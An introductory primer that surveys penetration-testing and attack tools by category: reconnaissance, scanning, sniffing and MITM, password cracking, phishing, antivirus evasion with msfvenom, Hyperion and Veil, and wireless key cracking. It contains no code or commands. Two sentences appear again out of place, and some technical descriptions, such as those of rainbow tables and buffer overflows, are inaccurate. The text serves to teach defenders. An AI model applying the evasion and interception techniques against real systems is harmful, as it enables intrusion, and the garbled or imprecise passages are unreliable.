Malicious Software Tools - A Primer

There is no shortage of tools, applications and software kits that aid in the process of penetration testing. These applications can and will be used by malicious crackers, and should be therefore also used by ethical hackers to understand their implications and "fight fire with fire", so to speak. This is a primer discussing these tools, and its purpose is not to list all of the possible tools exhaustively, but rather to serve as an introduction to each of the functionality of them and what goals they serve in the context of hacking.

Some of the most popular and versatile software tools used to penetrate and exploit systems grouped into their main function include (but are not limited to) the below.

Footprinting and Reconnaissance

• Netcraft and Whois Lookups: Netcraft logs the uptime of websites and a host of metadata information about domains and websites. Whois lookups are of course used to locate domain owners via the registrars which aids in social engineering attacks and domain spoofing as well.
• DNS Reconnaissance: Using Nslookup, dig and other DNS tools allows the attacker to discover all DNS service records of a domain as well as check if zone transfers are allowed in that domain.

Port and Vulnerability Scanning

• Nmap: A swiss army knife tool used for everything from port scanning to listing known services on listening ports. It is an industry standard for this purpose.
• Nessus: Tenable's Nessus is a very popular vulnerability scanner. It has commercial and free versions and there are entire courses dedicated to this tool.
• Metasploit: Metasploit is a penetration testing platform that hosts a plethora of almost all known software vulnerabilities and allows an attacker to procedurally exploit a target by scanning for open ports, detecting vulnerable services, and launch the known exploits against vulnerable services. It is built into Kali Linux.
• Nikto: This is a web application vulnerability scanner built into Kali Linux that is like Nessus but dedicated to web apps. It looks for dangerous files, outdated settings and web application configurations that are against security best practices.

Packet Capture and Sniffing

• Wireshark: Another extremely useful multi-purpose tool is Wireshark, a graphical network protocol analyzer that digs deep into individual packets and can capture Ethernet, Bluetooth, Wi-Fi and other kinds of traffic. It can even reconstruct packets and replay them (provided they are unencrypted of course).
• Snort: Snort is a well-known IDS/IPS tool, that acts initially as a packet capture then adds the capability to detect certain services, packets and raw data within the capture. Using its powerful ruleset, it is an essential tool in detecting vulnerabilities roaming around in network traffic that can be exploited by a well-targeted attack.
• Poisoning and Stripping attacks: ARP poisoning allows a man in the middle attack as the attacker acts as a gateway between victim networks, thereby capturing their traffic. DNS cache poisoning corrupts DNS cache entries allowing routing of traffic from intended for another site to one that the attacker controls. SSL attacks mainly include using tools such as Ettercap that acts as a man in the middle presenting its own fake website certificate to the victim, who inadvertently enters sensitive information in its form, which end up stolen by the attacker.

The most common vector for social engineering is, of course, email.

Password Attacks and Injecting Code

• Buffer Overflows: A buffer overflow allows an attacker to send malicious code that lies beyond the normal buffer of operations, executing it on the target system unhindered.
• Hydra: An online password attack tool Hydra allows the attacker to test usernames and passwords for running services.
• John the Ripper: One of the most popular tools for breaking passwords, John the Ripper main mode of operations is brute forcing. This is very useful in the case of LM hashes since the set of possible plaintext passwords is very limited.
• Rainbow Tables: A rainbow table contains a pre-hashed list of words rather than the words themselves. They hold every possible hash entry for a given algorithm.

Non-technical Attacks

• Social engineering: This is the art of tricking actual humans into doing your bidding, insidiously and without raising suspicion. The most common vector for social engineering is, of course, email. This leads us to our next item.
• Phishing and Spear-Phishing: Phishing attacks trick uses into divulging sensitive information by disguising as a real and authorized method of communication. Spear-phishing targets individuals, namely high profile ones rather than randomly throwing the net and hoping someone catches the bait.
• Spam: Even though spam is primarily used to disrupt networks and distribute unsolicited messages, it is for this reason attackers use it to spread malicious files that get lost in the large amount of marketing and advertising emails.

Netcraft logs the uptime of websites and a host of metadata information about domains and websites. 

Evasion and Bypassing Security Systems

• Msfvenom: This tool has options that allow the attacker to embed a Metasploit payload inside a legitimate binary. This can help the attacker in bypassing Anti-virus controls completely since legitimate binaries have valid digital signatures that are usually allowed by the AV agent.
• Hyperion: One way to disguise the malicious payload is to encrypt it. Hyperion uses the AES algorithm to encrypt the executable, which while running brute-forces the encryption key to decrypt itself back to its original, malicious executable.
• Veil-Evasion: Another tool used by attackers to evade traditional AV systems. It uses Python language to generate encrypted executables.

Wireless Attacks

• Aircrack-ng: WEP has multiple inherent weaknesses that allow attackers to recover keys or alter legitimate packets. This tools cracks these keys and recovers them. It can also inject packets into the traffic. It can even be used to crack WPA/WPA2 keys via a daunting process that involves guessing the pre-shared key and capturing the WPA four-way handshake.